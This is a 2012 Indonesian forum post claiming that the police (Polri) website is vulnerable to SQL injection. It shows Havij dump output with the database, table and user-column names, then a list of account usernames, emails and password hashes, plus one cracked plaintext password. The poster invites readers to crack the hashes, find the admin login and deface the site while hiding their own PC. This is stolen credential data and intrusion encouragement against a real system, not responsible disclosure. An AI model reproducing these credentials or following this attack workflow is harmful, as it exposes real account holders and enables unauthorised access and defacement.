Ceriwis

Ceriwis (https://forum.ceriwis.com/forum.php)
-   Lounge (https://forum.ceriwis.com/forumdisplay.php?f=9)
-   -   Situs Polri yang Lemah.. [HACKER Pro Masuk sene..] (https://forum.ceriwis.com/showthread.php?t=1010496)

ps3black 27th May 2012 06:51 PM
Situs Polri yang Lemah.. [HACKER Pro Masuk sene..]
 

Mungkin beberapa waktu lalu, kalian melihat berita bahwa situs resmi POLRI di hack



Ternyata webmaster dari situs tersebut belum menambal �lubang� yang sangat mudah buat di masukin para hacker



sekarang,



Langsung aja, saya akan menjelaskan beberapa bukti bahwa website polri masih rentan di deface







Disini saya menjelaskan web polri rentan dengan serangan SQL Injection



pada halaman :




[/spoiler]
Spoiler for open this:
Spoiler for open this:
Spoiler for open this:
for SS:






http://i.imm.io/7azw.png









Sekarang saya mencoba mencari databasenya, dan hasilnya adalah

(saya pakai havij supaya mudah dan rapi untuk menulis data nya disini )




Spoiler for open this:
Spoiler for open this:
for database:






(+) Informations:

(+) User : [email protected]

(+) Database : podb

(+) Version : 5.0.77

(+) Other DB : information_schema



(+) Tables from podb:

01_nad,02_sumut

03_riau,04_kepri

05_sumbar

06_bengkulu

08_sumsel

09_lampung

10_metro

11_jabar

12_jateng

13_diy

14_jatim

15_bali

16_ntb

17_ntt

18_kalbar

19_kalsel

20_kalteng

21_kaltim

22_sulsel

23_sultra

24_sulteng

25_sulut

26_maluku

27_papua

28_babel

29_banten

30_gorontalo

31_malut

_pol_banner_Goid

_pol_buku_tamu_Goid

_pol_contact_Goid

_pol_counter_Goid

_pol_data_Goid

_pol_doh_Goid

_pol_dpo_Goid

_pol_event_Goid

_pol_highlight_Goid

_pol_kantor_Goid

_pol_kantor_satker_Goid

_pol_kantor_subsatker_Goid

_pol_kapolda_Goid

_pol_kapolri_Goid

_pol_kasus_Goid

_pol_laporan_pengaduan_Goid

_pol_laporan_pengaduan_identitas_Goid

_pol_laporan_pengaduan_type_Goid

_pol_link_Goid

_pol_link_internal_Goid

_pol_mailing_list_Goid

_pol_map_master_goid

_pol_map_region_goid

_pol_news_Goid

_pol_news_category_Goid

_pol_organisasi_Goid

_pol_polling_Goid

_pol_social_network_Goid

_pol_str_polda

_pol_str_polda_desc

_pol_str_polda_isi

_pol_struktur_org_Goid

_pol_user_Goid

_pol_video_Goid



(+) Columns _pol_user_Goid:

id_user

username

nama

password

email

id_kantor

id_satker

id_subsatker

role

id_filter










Spoiler for open this:
Spoiler for open this:
for Code Username + Password:








ad776552a38491d636f7651ee07cc1ef [email protected] 0p5_ntb

b9713801dc6796defa4f8f5b57f3712e [email protected] 1twasda_polda_ntb

c2b2030d2906ef9baa3899046b49d9d6 [email protected] 53tum_ntb

9dd71dffc076283a1b72ff6a92a4e05d [email protected] 5pn_polda

e38f77956ac1f287a3a30e7d51a8c391 [email protected] adminmulmed

bdc697aafadf91f71f76f1e17bf369da [email protected] annisa

de17704ae819493c2e0116160db9445e [email protected] b1dkum

1273fa9bfa227caf63586c03c8ab831e [email protected] b1dku_polda

243eed5bb9300c759c5f4f28878f5de4 [email protected] b1n@mitr@

e952bc6a728541d28e9426478c227822 [email protected] balikpapan

a49abf2977ce9680e6ac875bbdd88815 [email protected] berau

4de67bf1274d2cdd5c06bb349c02f2d8 [email protected] bidku

dec737701f9d9326d4c57a03517ae146 [email protected] bidkum

924bc8f66a42e7b407bcb00e7b8bb630 [email protected] bidtel

46bb4cfce578b08788dc3db814910268 [email protected] bidtel_polda_sumut

952f762da8c9b5705b4274220e57a774 [email protected] bid_dokkes_polda_jabar

dd29348037a82d27ed31a70d13fe3adb [email protected] bid_humas

e59abeeca549c219522fb32d3fc9fccd [email protected] bid_humas_polda_jabar

b3e632cd79e77b97307cf214ae93bb7f [email protected] bid_kum_polda_jabar

d4a055e6339bc372cd5930fb0042bb7d [email protected] bid_ku_polda_jabar

71a8ca66f03751deac655eb737f091c8 [email protected] bid_propam_polda_jabar

9dd71dffc076283a1b72ff6a92a4e05d [email protected] bid_telematika

1b44f6b00577b1cff45148f9870e8c9d [email protected] bid_telematika_polda_j











Sekarang tinggal mengkrack password dan mencari login adminnya



Apa yang anda pikirkan?



begitu mudah kah?





Begitu �mudah� untuk website sekelas POLRI !



Bagaimana bila situs tersebut bukan di masuki hacker lokal, tp hacker luar negeri, bisa ancur tuh





And 1. Jangan Defaced Lewat PC pribadi.. Lobang buaya tuh.. Ati2..







Password Email username

balibali [email protected] bid_telematika_polda_j

Sumber :k@skus



Tinggal Cari Login adminnya..








Spoiler for open this:
Spoiler for open this:
for BACA:







Spoiler for open this:
Spoiler for open this:
for Sorry:




sorry ya gan kalo:repost:








Spoiler for open this:
Spoiler for open this:
for melon:




TS Ini menerima :melonndan:

Kalo blom ISO :rate5 aja gan








[spoiler=open this] for Bata:




TS Ini tidak menerima :cabendan:

















</div>


All times are GMT +7. The time now is 12:52 PM.